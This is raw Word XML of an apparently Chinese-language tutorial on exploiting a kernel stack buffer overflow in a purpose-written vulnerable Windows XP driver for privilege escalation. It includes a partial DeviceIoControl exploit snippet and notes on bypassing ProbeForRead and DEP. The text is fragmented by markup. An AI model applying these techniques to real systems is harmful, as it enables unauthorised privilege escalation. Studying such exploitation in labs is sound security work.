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283B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72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>内核缓冲区溢出漏洞利用实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>r3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>应用层进程提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03EBEF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利用思路：在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>下，</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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函数没有对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的长度做严格的检查，所以可以使用该函数对内核堆栈进行溢出，覆盖函数的返回地址，使</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri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指向我们自己构造的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跳板指令处。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537EEB3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6B4C0998" w14:textId="59C01C48" w:rsidR="00C06777" w:rsidRDefault="00C06777" w:rsidP="00C06777">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>0x00:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>首先验证猜想，对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函数进行验证，看是否有对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的长度、指针的合法性进行校验，异或是其他的安全检查：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A09E0B4" w14:textId="680C98F8" w:rsidR="00697F62" w:rsidRPr="00697F62" w:rsidRDefault="00697F62" w:rsidP="00C06777">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r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 wp14:anchorId="46554DEA" wp14:editId="519AF275">
            <wp:extent cx="5266055" cy="2776855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="../../../../../../../../var/folders/h6/vfnqvg6n00q7hbzbf3lmcqbm0000gn/T/com.evernote.Evernote/WebKitDnD.NHj9Mz/5F93AE84-8FD3-4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var/folders/h6/vfnqvg6n00q7hbzbf3lmcqbm0000gn/T/com.evernote.Evernote/WebKitDnD.NHj9Mz/5F93AE84-8FD3-42B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08A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5E6EA372" w14:textId="4BD1E934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上图中，可以发现，在上面的反汇编指令中，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri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函数的实现是直接使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">rep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>movs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>串传送指令，直接将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>des</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>缓冲区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55813B0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9C1997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可以得出，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>RtlCopyMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>函数没有对des参数做任何的安全检查，但是，在copy之前，我们的目标驱动（要攻击的内核模块）会在copy之前使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>probeforRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>对des地址进行地址合法性校验，往后看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329269F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0CBB8B0A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0x01:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>接下来，编写含有漏洞的</w:t>
      </w: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驱动，以及</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>expolit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>的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程序。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使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>DeviceIoControl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>通信触发攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D1BA0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35DB602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的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>DriverUnload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>函数中，指定好</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>deviceIoControl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>分发函数，并执行含有漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sub_0123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>函数，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sub_0123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>函数中，执行了含有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03E945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漏洞的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D18CBA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44AC447" wp14:editId="0358ADBD">
            <wp:extent cx="6096000" cy="3996055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="TSTATUS UserBuffer, ULONG Size) &#10;PVOID &#10;NTSTATUS ntStatus = STATUS_SUCCESS; &#10;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STATUS UserBuffer, ULONG Size) &#10;PVOID &#10;NTSTATUS ntStatus = STATUS_SUCCESS; &#10;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28A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0AA1D1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192A9D3A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r0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>编写完之后，再来编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>r3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>expolit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE717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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB2EA4E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Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>0x02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>：绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>的非可执行区域引发的异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3AA42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当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>我们的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到被标记为非可执行内存区域时，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>将会引发异常，从而不会执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>，转而去执行异常处理例程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F378836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但是，我们可以通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>重新申请一段内存，并对该内存所在页标记为可执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071381D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28288B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R3的攻击代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C41964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DWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dwRet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= 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EF8A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WCHAR *buffer = (WCHAR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>malloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(512*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(WCHAR));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366220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memset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(buffer,0x41,512*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(WCHAR));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033DD41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printf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gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Please press any key to send Attack!\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BBCC60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getch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gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C3679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DeviceIoControl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hDevice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E29141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CTL_PRINT, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB52F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buffer, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB8EBA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512 * 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(WCHAR), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF2EB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buffer, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0F93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512 * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(WCHAR), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135512F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&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dwRet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C6383F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>NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68958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33DA20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其中，CTL_PRINT是r3指定的通讯方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CD64E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color w:val="0433FF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MYIOCTRL_CODE(</w:t>
      </w:r>
      <w:proofErr w:type="spell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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636554A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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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CTL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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 xml:space="preserve">FILE_DEVICE_UNKNOWN, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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IOCTRL_BASE+i</w:t>
      </w:r>
      <w:proofErr w:type="spell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, METHOD_NEITHER,FILE_ANY_ACCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72D878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9E72C3E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CTL_HELLO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0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2499064A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CTL_PRINT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1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1D930E77" w14:textId="77777777" w:rsidR="00C06777" w:rsidRDefault="00C06777" w:rsidP="00C06777">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pP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#define CTL_BYE MYIOCTRL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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CODE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="0433FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EACF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3B5D7ED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这样，进入内核后，直接使用的就是环3的地址空间了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD8613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641643A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但是，这里出现了问题，也就是刚刚提到的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ProbeForRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>函数的指针合法性校验：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E8B94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C0DEC3F" wp14:editId="3D2D1CC1">
            <wp:extent cx="9804400" cy="6612255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9" descr=" : 0001124A &#10;. text : 0001124C &#10;. text 000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: 0001124A &#10;. text : 0001124C &#10;. text 00011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0" cy="66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76CC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0AB3354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80F64A5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那么，就需要过掉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函数，才可以往后进行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2194D9D9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函数会将第一个参数做为内存空间，做了如下检查：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66760D61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1、如果该地址范围超出环3，那么该函数引发STATUS_ACCESS_VIOLATION异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC413E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2、如果该地址没有按照指定的内存对齐格式对齐，则引发STATUS_DATA_MISALIGNMENT异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578FBCCA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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A8659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既然非用户地址范围的空间会引发异常，那么就需要内核直接访问r3的buffer，基于do buffer和direct 的方式，IO管理器都会在内核空间开辟一段空间，并且将用户的buffer拷贝到该空间中，所以这两种方式的IO都不能过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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0610CC91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既然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deviceIoControl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 xml:space="preserve">的通讯方式是r3来指定的，也就是由我们的攻击程序来指定，so，neither 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io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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D848E0C" w14:textId="77777777" w:rsidR="00C06777" w:rsidRDefault="00C06777" w:rsidP="00C06777">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>到了这里，我们过掉了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ProbeForRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>，并且向内核空间写入了我们的数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A451D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6B4F94D" wp14:editId="67CCA2A3">
            <wp:extent cx="7315200" cy="8991600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
